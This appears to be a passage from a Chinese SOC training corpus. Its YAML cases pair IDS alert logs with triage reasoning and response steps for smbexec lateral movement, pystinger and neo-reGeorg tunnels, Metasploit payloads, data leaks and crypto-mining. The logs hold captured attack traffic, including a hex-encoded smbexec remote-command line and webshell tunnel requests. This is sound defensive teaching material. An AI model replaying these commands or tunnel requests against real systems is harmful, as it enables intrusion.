0FFFFFFFF000000000000000000000000000000000500000310000000BC01000002000000A401000000000C00000000006E3AA0F6D5C81D44AE0903AF4DC59EC8070000000000000007000000420054004F00420054004F000000AAAA860A0000070000000000000007000000420054004F00420054004F000000BFBFFF010F001000000003000000000000008E000000000000008E000000250043004F004D005300500045004300250020002F00510020002F00630020006500630068006F00200063006400200020005E003E0020005C005C003100320037002E0030002E0030002E0031005C00430024005C005F005F006F0075007400700075007400200032005E003E005E002600310020003E0020002500540045004D00500025005C0065007800650063007500740065002E00620061007400200026002000250043004F",
79 | "HLShift": "[4-2160][16]",
80 | "name": "检测到黑客工具impacket smbexec执行远程命令",
81 | "txId": "0",
82 | "confidence": "High",
83 | "attackStage": "4",
84 | "attackStatus": "1",
85 | "pcapRecord": "true",
86 | "tacticId": "TA0008",
87 | "techniquesId": "T1210",
88 | "message": "检测到黑客工具impacket smbexec执行远程命令. 来源:101.200.160.124/20166, 目的:10.99.15.61/5679",
89 | "isAPT": "false",
90 | "killChain": "KC_LateralMov"
91 | }
92 | ```
--------------------------------------------------------------------------------
/raw_corpus/HT/ht-003-pystinger_tunnel_communication.yaml:
--------------------------------------------------------------------------------
1 | - ID: ht-003
2 | Category: 黑客工具
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - 毒刺pystinger隧道通信工具检测
8 | - 典型的隧道通信C2行为
9 | Title_CN: 黑客工具-毒刺pystinger隧道通信
10 | Title_EN: hacker tool - pystinger tunnel communication
11 | Question: |
12 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
13 | - 组织背景:阿里云信息招聘网站环境
14 | - 事件描述:检测到来源IP 101.200.160.124 通过HTTP协议向服务器10.19.61.92的/proxy.php接口发起POST请求,响应状态码为200,目标成功返回数据包
15 | - 上下文:该通信流量特征与毒刺pystinger隧道通信工具高度匹配。攻击流量使用伪造浏览器 User-Agent(Chrome/58.0.3029.110)和常见路径"/proxy.php"以掩盖C2通信。POST 请求体中包含字段 SENDDATA 与 Remoteserver,数据经Base64编码,符合已知IOC特征
16 |
17 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
18 | Complex_CoT: |
19 | 1. 核查/proxy.php接口访问日志,确认是否存在异常大量POST请求行为。
20 | 2. 检查服务器10.19.61.92上是否部署了后门程序或恶意代理模块。
21 | 3. 使用NTA(网络流量分析)回溯101.200.160.124历史连接行为,判断是否存在持久隧道通信特征。
22 | 4. 对攻击来源IP进行WHOIS查询及威胁情报检索,确认其背景归属及风险等级。
23 | 5. 检查是否存在其他受害主机同样与101.200.160.124建立过通信。
24 | 6. 根据MITRE ATT&CK模型,确认隧道通信是否伴随后续C2命令、数据泄露行为。
25 | 7. 评估内网扩散风险,考虑是否进行内网资产扫描以排查潜在横向渗透。
26 |
27 | Response: |
28 | 1. 临时封禁来源IP 101.200.160.124,并在防火墙和WAF配置封锁其访问。
29 | 2. 立即隔离服务器10.19.61.92,防止潜在C2通信进一步执行命令。
30 | 3. 导出/proxy.php相关日志文件,交由威胁分析团队进行取证溯源。
31 | 4. 扫描服务器10.19.61.92是否存在已知pystinger通信组件或异常进程。
32 | 5. 对连接到10.19.61.92的其他主机流量进行异常检测,排查潜在扩散风险。
33 | 6. 更新入侵检测(IDS/IPS)特征库,添加相关pystinger通信特征规则。
34 | 7. 启动安全事件通报机制,定期更新调查进展并组织总结复盘,完善隧道通信防御策略。
35 |
36 | Log_Sample: |
37 | ```
38 | {
39 | "transProtocol": "TCP",
40 | "appProtocol": "http",
41 | "srcAddress": "101.200.160.124",
42 | "srcPort": "20015",
43 | "destAddress": "10.19.61.92",
44 | "destPort": "5679",
45 | "vlanId": "203",
46 | "deviceAddress": "10.11.72.24",
47 | "eventCount": "1",
48 | "srcGeoCountry": "中国",
49 | "destGeoCountry": "中国",
50 | "destGeoRegion": "上海",
51 | "destGeoCity": "上海",
52 | "direction": "10",
53 | "victimAddress": "srcAddress",
54 | "victim": ["101.200.160.124"],
55 | "srcSecurityZone": "outer",
56 | "logType": "alert",
57 | "dataType": "ids",
58 | "catOutcome": "OK",
59 | "severity": "7",
60 | "startTime": "2025-04-08 22:34:12",
61 | "endTime": "2025-04-08 22:34:12",
62 | "deviceReceiptTime": "2025-04-08 22:34:12",
63 | "collectorReceiptTime": "2025-04-08 22:34:12",
64 | "ruleName": "检测到毒刺pystinger隧道通信工具",
65 | "ruleType": "/SuspTraffic/Tunnel",
66 | "alarmType": "隧道通信->其他",
67 | "requestMethod": "POST",
68 | "requestUrlQuery": "/proxy.php",
69 | "requestUrl": "/proxy.php",
70 | "requestHeader": "POST /proxy.php HTTP/1.1
Host: 10.211.55.3:8080
Connection: keep-alive
Accept-Encoding: gzip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
",
71 | "requestBody": "SENDDATA=eyJjbG9zZV9jbGllbnRzIjogW10sICJtaXJyb3JfY2xvc2VfY2xpZW50cyI6IFtdLCAiZGF0YSI6IHt9LCAibWlycm9yX2RhdGEiOiB7fX0%3D&Endpoint=%2Fdata_sync%2F&Remoteserver=http%3A%2F%2F127.0.0.1%3A60010",
72 | "responseHeader": "HTTP/1.1 200 OK
Date: Thu, 22 Sep 2022 04:57:02 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.3.29
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
",
73 | "responseMsg": "eyJyZXR1cm5fZGF0YSI6IHt9LCAid2FpdCI6IDAuMDUsICJtaXJyb3JfcmV0dXJuX2RhdGEiOiB7fX0=",
74 | "responseCode": "200",
75 | "destHostName": "10.211.55.3:8080",
76 | "name": "检测到毒刺pystinger隧道通信工具",
77 | "txId": "8",
78 | "confidence": "High",
79 | "httpVersion": "HTTP/1.1",
80 | "accessAgent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
81 | "attackStage": "5",
82 | "attackStatus": "1",
83 | "tacticId": "TA0011",
84 | "techniquesId": "T1090",
85 | "message": "检测到毒刺pystinger隧道通信工具. 来源:101.200.160.124/20015, 目的:10.19.61.92/5679",
86 | "isAPT": "false",
87 | "killChain": "KC_CommandControl",
88 | "mssTag": "MSS0030,MSS0059,MSS0060"
89 | }
90 | ```
--------------------------------------------------------------------------------
/raw_corpus/HT/ht-004-metasploit_payload_transmission.yaml:
--------------------------------------------------------------------------------
1 | - ID: ht-004
2 | Category: 黑客工具
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - Metasploit远控Payload传输检测
8 | - 典型的C2命令控制行为
9 | Title_CN: 黑客工具-Metasploit远控Payload传输
10 | Title_EN: hacker tool - metasploit payload transmission
11 | Question: |
12 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
13 | - 组织背景:内网环境,存在对外网络访问
14 | - 事件描述:系统检测到从内网主机 192.168.152.61(位于上海)向公网主机 119.200.10.14(北京区域IP)传输可疑Payload,匹配Metasploit生成的远程控制载荷特征
15 | - 上下文:此行为通常出现在攻击链第四阶段(命令与控制阶段),攻击者利用植入的后门与C2服务器建立会话,进行命令下发或控制操作。Payload传输过程表现为特征性TCP通信,无正常业务上下文,Payload字段中呈现大量空字节填充及特征结构数据,初步判定为C2信道建立或Beacon回连行为
16 |
17 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
18 | Complex_CoT: |
19 | 1. 核查 192.168.152.61 是否存在已知远控木马组件,尤其关注Metasploit默认目录及命名结构。
20 | 2. 回溯端口 5679 的通信历史,确认是否存在周期性Beacon通信行为。
21 | 3. 分析 119.200.10.14 与其他内网主机是否存在类似C2流量,判断是否为大规模攻击。
22 | 4. 利用EDR终端日志还原Payload落地及执行链路,重点分析是否成功建立控制会话。
23 | 5. 核查是否有相关进程调用cmd/powershell等执行命令的记录。
24 | 6. 结合防火墙、流量分析日志判断该连接是否已建立双向通信。
25 | 7. 对 119.200.10.14 进行威胁情报查询,判断其是否为恶意C2服务器或跳板机。
26 |
27 | Response: |
28 | 1. 立即隔离内网主机 192.168.152.61,防止可能的进一步控制和数据泄露。
29 | 2. 获取该主机24小时内的完整流量包(PCAP)和终端操作记录,提取所有相关上下文。
30 | 3. 启动主机威胁狩猎流程,分析是否存在已植入的木马或远控工具。
31 | 4. 在边界设备上临时封禁目标公网IP 119.200.10.14。
32 | 5. 根据检测规则更新IPS/IDS策略,对相同Payload结构加入拦截。
33 | 6. 检查该主机是否被用于反向代理、VPN或跳板操作,排除内网被滥用风险。
34 | 7. 通知威胁情报团队进行C2指纹提取,扩展IOC追踪与防御策略。
35 |
36 | Log_Sample: |
37 | ```
38 | {
39 | "transProtocol": "TCP",
40 | "srcAddress": "119.200.10.14",
41 | "srcPort": "20071",
42 | "destAddress": "192.168.152.61",
43 | "destPort": "5679",
44 | "eventCount": "1",
45 | "srcGeoLongitude": "116.401159",
46 | "srcGeoLatitude": "39.902798",
47 | "destGeoLongitude": "121.442254",
48 | "destGeoLatitude": "31.290135",
49 | "direction": "10",
50 | "attackerAddress": "destAddress",
51 | "victimAddress": "srcAddress",
52 | "attackDirection": "0",
53 | "attacker": ["192.168.152.61"],
54 | "victim": ["119.200.10.14"],
55 | "srcSecurityZone": "outer",
56 | "logType": "alert",
57 | "dataType": "ids",
58 | "dataSubType": "attackAlert",
59 | "catOutcome": "OK",
60 | "catTechnique": "/Code/Trojan",
61 | "severity": "7",
62 | "startTime": "2025-04-08 23:17:21",
63 | "endTime": "2025-04-08 23:17:21",
64 | "deviceReceiptTime": "2025-04-08 23:17:21",
65 | "collectorReceiptTime": "2025-04-08 23:17:21",
66 | "ruleName": "检测到Metasploit传输payload(tcp协议)",
67 | "ruleType": "/SuspTraffic/RemoteCtrl",
68 | "alarmType": "远程控制->远控执行",
69 | "payload": "..............................................................................................",
70 | "rawPayload": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001A000000571B0010......",
71 | "name": "检测到Metasploit传输payload(tcp协议)",
72 | "txId": "0",
73 | "confidence": "High",
74 | "attackStage": "4",
75 | "attackStatus": "1",
76 | "pcapRecord": "true",
77 | "tacticId": "TA0011",
78 | "techniquesId": "T1071",
79 | "message": "检测到Metasploit传输payload(tcp协议). 来源:119.200.10.14/20071, 目的:192.168.152.61/5679",
80 | "isAPT": "false",
81 | "killChain": "KC_CommandControl"
82 | }
83 | ```
--------------------------------------------------------------------------------
/raw_corpus/HT/ht-005-neo_regeorg_tunnel_communication.yaml:
--------------------------------------------------------------------------------
1 | - ID: ht-005
2 | Category: 黑客工具
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - neo-reGeorg加密隧道通信工具检测
8 | - 典型的WebShell隧道代理行为
9 | Title_CN: 黑客工具-neo-reGeorg加密隧道通信
10 | Title_EN: hacker tool - neo regeorg tunnel communication
11 | Question: |
12 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
13 | - 组织背景:公有云主机环境,位于上海
14 | - 事件描述:检测到外部IP 110.119.180.124 向内网主机 10.91.110.99 发起 HTTP POST 请求,目标路径为 "/tunnel.php",响应状态码为200
15 | - 上下文:User-Agent 信息伪装为 Safari 浏览器,通信使用非标准自定义Header字段(如 Ffydhndmhhl),请求体为加密二进制数据,符合 neo-reGeorg 工具特征。neo-reGeorg 是常用于通过WebShell创建加密隧道的隧道工具,本次通信行为可能用于远程SOCKS代理或内网横向移动
16 |
17 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
18 | Complex_CoT: |
19 | 1. 检查10.91.110.99主机Web服务是否存在被上传的恶意PHP代理脚本(如tunnel.php)。
20 | 2. 追踪该HTTP通信会话,确认是否存在长连接、持续代理行为(例如SOCKS over HTTP)。
21 | 3. 检查该主机是否与其他内网资产有异常连接,判断是否存在隧道转发和横向渗透操作。
22 | 4. 使用沙箱或手动分析方式解析请求体中加密内容,评估数据传输类型与敏感程度。
23 | 5. 利用IDS/NTA工具进行历史流量还原,分析是否早前已有该路径通信行为被忽略。
24 | 6. 检索是否有其他主机也存在 /tunnel.php 或相似路径的访问行为,排查攻击面广度。
25 | 7. 判断是否存在WebShell行为残留,如上传脚本、定时任务、自启动代理等。
26 |
27 | Response: |
28 | 1. 紧急隔离10.91.110.99主机,防止其继续作为隧道节点或被远控操作。
29 | 2. 对110.119.180.124实施封禁并将其纳入威胁情报黑名单。
30 | 3. 提取/tunnel.php脚本文件及其上下文日志,进行样本分析及取证。
31 | 4. 启动Web服务器路径扫描和文件完整性检测,识别是否有其他隐藏代理入口。
32 | 5. 在防火墙和WAF中添加基于neo-reGeorg通信特征的阻断策略(如特定User-Agent与路径组合)。
33 | 6. 对与该主机有交互记录的其他主机执行横向检测,防止侧向渗透形成攻击链条。
34 | 7. 更新内网资产的Web应用安全策略,纳入文件上传、路径访问及长连接行为的实时监控与报警。
35 |
36 | Log_Sample: |
37 | ```
38 | {
39 | "transProtocol": "TCP",
40 | "appProtocol": "http",
41 | "srcAddress": "110.119.180.124",
42 | "srcPort": "20019",
43 | "destAddress": "10.91.110.99",
44 | "destPort": "5679",
45 | "eventCount": "1",
46 | "srcGeoCountry": "中国",
47 | "destGeoCountry": "中国",
48 | "destGeoRegion": "上海",
49 | "destGeoCity": "上海",
50 | "direction": "10",
51 | "attackerAddress": "110.119.180.124",
52 | "victimAddress": "10.91.110.99",
53 | "attackDirection": "1",
54 | "attacker": ["110.119.180.124"],
55 | "victim": ["10.91.110.99"],
56 | "srcSecurityZone": "outer",
57 | "logType": "alert",
58 | "dataType": "ids",
59 | "catOutcome": "OK",
60 | "catTechnique": "/TrafficAnomaly",
61 | "severity": "7",
62 | "startTime": "2025-04-08 23:14:37",
63 | "endTime": "2025-04-08 23:14:37",
64 | "deviceReceiptTime": "2025-04-08 23:14:37",
65 | "collectorReceiptTime": "2025-04-08 23:14:37",
66 | "ruleName": "检测到neo-reGeorg加密通信流量(PHP)",
67 | "ruleType": "/SuspTraffic/Tunnel",
68 | "alarmType": "隧道通信->其他",
69 | "requestMethod": "POST",
70 | "requestUrlQuery": "/tunnel.php",
71 | "requestUrl": "/tunnel.php",
72 | "requestHeader": "POST /tunnel.php HTTP/1.1
Host: 10.211.55.3:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/8.0.6 Safari/600.6.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Ffydhndmhhl: 8RGIFgZzRnuXw0chjWXQKACtWP7tBSKiDnysT9hP9pa
Content-type: application/octet-stream
Cookie: PHPSESSID=6003mhpta7uaj1l467ph7de084;
Content-Length: 536
",
73 | "requestBody": "HLlaQ0S2wv32drF2zPS6dvn4dPS6dvn4dq4TwbEhzXSLy5CVcXzLtTajcXCK15gic5CjQg8alUCD19BiX+4Qd7tLcPCi10BTtjBi1JoVt5hB1XRiX+4XdvAVYrtLfrSVcPEeYrlKwrU6fuY2X+4lzvljwaUbYrALcPEtd744dOi8wTaV10Ch5rUJfrALd7thcjEFdbH2d0Etkr1R531Rr0Ci1UMitlM7s9EEzIE6Yln2ko/4n0M31TzV1TkRsg/Qlg31w0E6fr/2Qgn2kv/Ds9EXfIFDdraD15C3wJCV10BKQUt8YqUjf9M31TzV1Tkt0oUJkvlKnXhRsPMpX+49YrY2zqljcPEhnIHKcPMD15CV1TzV15QAwJamcXCB19Mt0oUJkvlKn03UdqtDYO2VYThRY744z0KRYOlqdOULY+Ls+rtJYuELwai8dqn3krn2cPEmf03X5PimfX/iy5CVc+Ls+vSDfv22cPE+9UE5Hlt59a+SnbFJtIUhnbF2zq3KzvBAdq32frQAfOAbdX1t0RLs",
74 | "responseHeader": "HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Tue, 20 Sep 2022 09:59:56 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.29
Set-Cookie: PHPSESSID=6003mhpta7uaj1l467ph7de084; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Sbxspawzq: CapFLueBCn2ZM
",
75 | "responseCode": "200",
76 | "destHostName": "10.211.55.3:8081",
77 | "name": "检测到neo-reGeorg加密通信流量(PHP)",
78 | "txId": "147",
79 | "confidence": "High",
80 | "httpVersion": "HTTP/1.1",
81 | "accessAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/8.0.6 Safari/600.6.3",
82 | "attackStage": "5",
83 | "attackStatus": "1",
84 | "pcapRecord": "true",
85 | "tacticId": "TA0011",
86 | "techniquesId": "T1071",
87 | "toolsName": "neo-reGeorg",
88 | "message": "检测到neo-reGeorg加密通信流量(PHP). 来源:110.119.180.124/20019, 目的:10.91.110.99/5679",
89 | "isAPT": "false",
90 | "killChain": "KC_CommandControl"
91 | }
92 | ```
--------------------------------------------------------------------------------
/raw_corpus/IL/IL-002-web_root_directory_information_leakage.yaml:
--------------------------------------------------------------------------------
1 | - ID: il-002
2 | Category: 信息泄露
3 | Created_At: 2025-05-29
4 | Contributors:
5 | - [@wzfukui](https://github.com/wzfukui)
6 | Additional_Info: |
7 | - Web文件信息泄露,可能导致数据库连接参数、内部资产特性等信息曝光
8 | Title_CN: Web根目录文件遍历导致信息泄露,可下载/etc/passwd文件
9 | Title_EN: Web root directory information leakage, can download file conn.php
10 | Question: |
11 | - 组织背景:某公司官方网站有第三方服务团队维护,且部署在某公有云平台。外部服务人员定期登录系统进行相关的配置更新或者数据备份操作。
12 | - 事件描述:根据漏洞扫描器检测发现,用户服务器:8989端口开放,且根目录出现遍历漏洞,允许外部用户浏览当前目录所有文件并下载文件
13 | - 上下文:目前测试可下载的文件包括conn.php, index.php, utils/目录等。
14 |
15 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
16 | Complex_CoT: |
17 | 1. 首先,扫描器发现了服务器存在信息泄露,这是一个确定的客观事实。
18 | 2. 其次,而服务器之所以有信息泄露,是因为开放了Web端口(非网站标准端口,可能是临时的),且支持目录遍历。
19 | 3. 通常的IT运维场景,运维人员有可能为了备份或者下载文件,临时启动一个HTTP Server服务(不规范操作),并在后期忘记关闭,可能导致该问题
20 | 4. 也有可能是攻击者所启动的HTTP服务,需要深入核实。
21 | 2. 建议立即采取以下措施:
22 | - 对目标服务器进行一次全端口扫描,尤其是外网角度的扫描,确认其开放端口是否符合安全基线要求
23 | - 登录服务器查看具体是哪个进程开放了8989端口,对该进程进行终止操作,防止扩散影响
24 | - 检查内网流量审计,确认是否有针对8989端口的其他HTTP请求,识别是否有敏感信息实质泄露
25 | - 整理所有访问过8989端口的IP地址,尤其是外网IP地址,进行综合研判
26 | - 分析服务器登录日志,分析为什么会启动Web服务,并确认是否符合运维管理规范
27 | - 对访问/下载过敏感文件的IP进行挖掘,是否还攻击过其他系统?
28 |
29 | Response: |
30 | 已经收到了一个确定性的信息泄露事件,接下来准备启动事件处理:
31 | 1. 启动对目标服务器的全亮端口扫描,扫描模板必须支持Banner识别
32 | 2. 对conn.php文件进行分析,识别数据字段(注意,敏感信息脱敏)
33 | 3. 通过流量审计或者服务器日志,检查服务器:8989端口的访问记录,确认是否有非内部人员访问过并下载文件
34 | 4. 通过堡垒机、HIDS、EDR或云助手,执行命令,确认是哪个进程(以及父进程)启动的HTTP服务
35 | 5. 获取服务器最近24小时内的所有登录和操作日志
36 |
37 |
38 | 进一步决策(基于上述动作完成的结果):
39 | 1. 如果HTTP服务是Python这类临时工具启动的,则可以立即结束进程
40 | 2. 如果HTTP服务是系统特定的Web服务启动的,则需要检查该服务对应的配置文件,必要时候人工修改配置然后重启服务
41 | 3. 如果是生产环境,相关的修改/重启操作需要遵循操作规范
42 | 4. 如果敏感信息已经泄露,需要联系数据库DBA重置密码
43 | 5. 根据服务器的登录日志、操作日志甚至Web日志分析,确定端口是内部人员开放还是外部攻击者开放。
44 | 6. 如果是外部攻击者开放,需要进一步分析,攻击者是如何启动的服务,做深入的渗透行为分析。
--------------------------------------------------------------------------------
/raw_corpus/IL/il-001-github_sensitive_information_leakage.yaml:
--------------------------------------------------------------------------------
1 | - ID: il-001
2 | Category: 信息泄露
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - [@deepsec-top](https://github.com/deepsec-top)
6 | Additional_Info: |
7 | - 本内容不作为训练语料内容,仅作为共同编辑时参考。
8 | - Github信息泄露,往往可能出发网盘、笔记等系统的信息泄露和调查,未来可以在考虑丰富一下思路
9 | Title_CN: 信息泄露-github敏感信息泄露
10 | Title_EN: information leakage - github_sensitive_information_leakage
11 | Question: |
12 | - 组织背景:这是一个典型的医疗行业单位,该单位已经通过等级保护测评3级认证。信息系统由医院IT安全团队负责保障,另外有2~3名长期驻场的安全外包人员。使用了通用版VPN来提供远程访问。
13 | - 事件描述:根据合伙伙伴通知,该企业有敏感信息(部分信息系统的API KEY)暴露在github公开项目中。
14 | - 上下文:API KEY文本:sk-*****,github文件地址:https://github.com/example-com/oa-server/blob/main/main.py
15 |
16 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
17 | Complex_CoT: |
18 | 1. 首先,我们需要查看github文件的内容,发现存在API KEY文本:sk-*****,这表明企业敏感信息已经泄漏。可能攻击者已经利用泄漏的敏感信息进行了攻击。
19 | 2. 建议立即采取以下措施:
20 | - 修改泄漏敏感信息的信息系统API KEY,以防止攻击者继续利用泄漏的敏感信息进行了攻击
21 | - 修改可能通过泄漏敏感信息的信息系统API KEY进行关联推理得知的其他企业敏感信息,如其他信息系统API KEY、密码等。
22 | -对安全外包人员,除了使用通用版VPN提供远程访问,增加使用运维堡垒机等安全设备进行行为审计。
23 | - 对泄漏敏感信息的信息系统以及关联系统、数据库、中间件等进行全面的恶意软件扫描和清除。
24 | - 通过日志分析研判、异常事件分析研判、关联分析研判等检查攻击者是否已经利用泄漏的敏感信息进行了攻击。
25 | - 使用网络流量分析、日志分析等技术手段对泄密途径进行定位,找出泄露源头。
26 | - 利用技术工具确定泄露的代码库、泄露的内容和泄露的程度。
27 | - 在处理泄密人时,可能会遇到抵赖的情况。此时,可以通过社工手段进行定位,例如通过分析泄密人的社交网络、行为习惯等,获取相关证据。同时,也可以通过法律途径追究泄密人的责任。
28 | - 根据企业规定和制度,对泄密人进行相应处理,包括警告、辞退、法律诉讼等。
29 | - 检查Git工具或项目托管平台的漏洞,及时向相关工具或平台反馈,并要求工具或平台进行修复。
30 |
31 | Response: |
32 | 在github上企业部分信息系统的API KEY敏感信息泄漏,这是一个紧急的安全事件。建议立即采取以下动作:
33 | 1. 立即克隆github项目,实现信息泄露的证据固定
34 | 2. 浏览器访问github项目,代码泄露页面,并截图,实现信息泄露的证据固定
35 | 3. 要求开发者删除github项目中泄露的文件,并删除commit历史记录
36 | 4. 针对信息泄露的API接口进行审计,确认是否有外部调用的实质行为
37 |
38 |
39 | 进一步决策(基于上述动作完成的结果):
40 | 1. 检查Git工具或项目托管平台的漏洞,及时向相关工具或平台反馈,并要求工具或平台进行修复。
41 | 2. 识别API KEY的来源,并找到责任人,修改泄漏敏感信息的信息系统API KEY
42 | 3. 修改可能关联的其他企业敏感信息,如如其他信息系统API KEY、密码等
43 | 4. 增加使用运维堡垒机等安全设备进行行为审计
44 | 5. 对泄漏敏感信息的信息系统以及关联系统、数据库、中间件等进行全面的恶意软件扫描和清除。
45 | 6. 使用网络流量分析、日志分析等技术手段对泄密途径进行定位,找出泄露源头。
46 | 7. 利用技术工具确定泄露的代码库、泄露的内容和泄露的程度。
47 | 8. 根据企业规定和制度,对泄密人进行相应处理,包括警告、辞退、法律诉讼等。
48 |
--------------------------------------------------------------------------------
/raw_corpus/MC/mc-001-mining_trojan_communication.yaml:
--------------------------------------------------------------------------------
1 | - ID: mc-001
2 | Category: 挖矿木马
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - 挖矿木马外联通信检测
8 | - Monero RandomX算法挖矿行为
9 | Title_CN: 挖矿木马-挖矿木马外联通信
10 | Title_EN: mining trojan - mining trojan communication
11 | Question: |
12 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
13 | - 组织背景:公有云主机环境,存在外部网络访问
14 | - 事件描述:检测到外部主机101.20.160.124与内网主机10.9.12.66之间建立TCP连接,目标端口为5679
15 | - 上下文:通信内容为JSON-RPC格式,出现字段 "jsonrpc"、"job"、"blob"、"target" 等,algo字段值为"rx/0",为Monero使用的RandomX算法。初步判断该行为为矿机发起向矿池或C2服务器进行任务拉取的行为,存在明显的挖矿任务分发通信特征
16 |
17 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
18 | Complex_CoT: |
19 | 1. 分析该主机是否在其他时间点也有挖矿通信行为,评估是否为僵尸网络节点。
20 | 2. 回溯101.20.160.124是否与其他内网主机存在类似通信,排查是否为扫描或横向渗透前置行为。
21 | 3. 在内网10.9.12.66主机上排查是否存在挖矿程序(如XMRig),检测其启动项、计划任务及进程特征。
22 | 4. 关联防病毒/EDR日志,判断是否有恶意文件落地行为。
23 | 5. 结合NTA数据检查是否存在其它使用TCP高位端口的异常流量,辅助识别隐蔽C2信道。
24 | 6. 查询101.20.160.124是否存在已知威胁标签或与矿池相关的历史情报。
25 | 7. 基于MITRE ATT&CK框架确认是否存在数据窃取、命令控制或持久化相关行为。
26 |
27 | Response: |
28 | 1. 暂时隔离内网主机10.9.12.66,防止继续参与挖矿或被C2控制。
29 | 2. 临时封禁101.20.160.124来源地址,防止其对其他主机进行访问。
30 | 3. 导出通信流量(PCAP),交由威胁分析团队深入还原挖矿行为细节。
31 | 4. 在EDR上执行全面杀毒扫描,定位潜在矿机组件和启动方式。
32 | 5. 检查是否有其他主机访问5679端口或使用JSON-RPC协议进行外联。
33 | 6. 在IDS/IPS中新增针对该类挖矿行为的检测规则(如algo="rx/0" & job_id存在)。
34 | 7. 更新资产管理清单,记录受影响主机及整改措施,并撰写通报通函供后续审计使用。
35 |
36 | Log_Sample: |
37 | ```
38 | {
39 | "transProtocol": "TCP",
40 | "srcAddress": "101.20.160.124",
41 | "srcPort": "20061",
42 | "destAddress": "10.9.12.66",
43 | "destPort": "5679",
44 | "eventCount": "1",
45 | "srcGeoCountry": "中国",
46 | "destGeoCountry": "中国",
47 | "destGeoRegion": "上海",
48 | "destGeoCity": "上海",
49 | "direction": "10",
50 | "victimAddress": "srcAddress",
51 | "victim": ["101.20.160.124"],
52 | "srcSecurityZone": "outer",
53 | "logType": "alert",
54 | "catOutcome": "OK",
55 | "catTechnique": "/Code/Trojan",
56 | "severity": "7",
57 | "startTime": "2025-04-08 23:16:01",
58 | "endTime": "2025-04-08 23:16:01",
59 | "deviceReceiptTime": "2025-04-08 23:16:01",
60 | "collectorReceiptTime": "2025-04-08 23:16:01",
61 | "ruleName": "检测到挖矿木马外联通讯",
62 | "ruleType": "/Malware/Miner",
63 | "alarmType": "挖矿->挖矿软件",
64 | "payload": "{\"jsonrpc\":\"2.0\",\"id\":1,\"error\":null,\"result\":{\"id\":\"113263\",\"job\":{\"blob\":\"101087e5eb9b064fd0a16f6166ea5886982bba9cda42254328378e9acfc3387e3f9b1803a6b74300000000a2b6b324a8c7f83528632a955688ae2ee5676f03ba33e7cd68d614e1922319ce05\",\"algo\":\"rx/0\",\"height\":2760321,\"seed_hash\":\"5282d00ee18f482ede0e0f63ed6464abd8f02ba98f01cfdec77e400fac1d6eff\",\"job_id\":\"113264\",\"target\":\"8b4f0100\",\"id\":\"113263\"},\"status\":\"OK\"}}",
65 | "name": "检测到挖矿木马外联通讯",
66 | "confidence": "Medium",
67 | "attackStage": "5",
68 | "attackStatus": "1",
69 | "pcapRecord": "true",
70 | "tacticId": "TA0011",
71 | "techniquesId": "T1095",
72 | "message": "检测到挖矿木马外联通讯. 来源:101.20.160.124/20061, 目的:10.9.12.66/5679",
73 | "isAPT": "false",
74 | "killChain": "KC_CommandControl",
75 | "mssTag": "MSS0001"
76 | }
77 | ```
--------------------------------------------------------------------------------
/raw_corpus/README.md:
--------------------------------------------------------------------------------
1 | # DeepSec 网络安全运营语料库
2 |
3 | ## 📊 语料统计
4 |
5 | | 分类 | 数量 | 说明 |
6 | |------|------|------|
7 | | 后门木马 (BT) | 3 | 包含CobaltStrike、冰蝎等后门木马检测案例 |
8 | | 黑客工具 (HT) | 4 | 包含各类渗透测试和攻击工具检测案例 |
9 | | Web攻击 (WA) | 4 | 包含SQL注入、模板注入、反序列化等Web攻击案例 |
10 | | 挖矿相关 (MC) | 1 | 包含挖矿木马通信检测案例 |
11 | | 漏洞利用 (VR) | 1 | 包含Exchange ProxyLogon等漏洞利用案例 |
12 | | 信息泄露 (IL) | 2 | 包含GitHub敏感信息泄露、Web目录遍历等案例 |
13 | | 钓鱼攻击 (FA) | 0 | 暂无语料 |
14 |
15 | **总计:15个语料文件**
16 |
17 | ---
18 |
19 | ## 📁 语料详细列表
20 |
21 | ### 🔴 后门木马 (BT - Backdoor Trojan)
22 |
23 | | ID | 语料标题 | 贡献人 |
24 | |----|----------|--------|
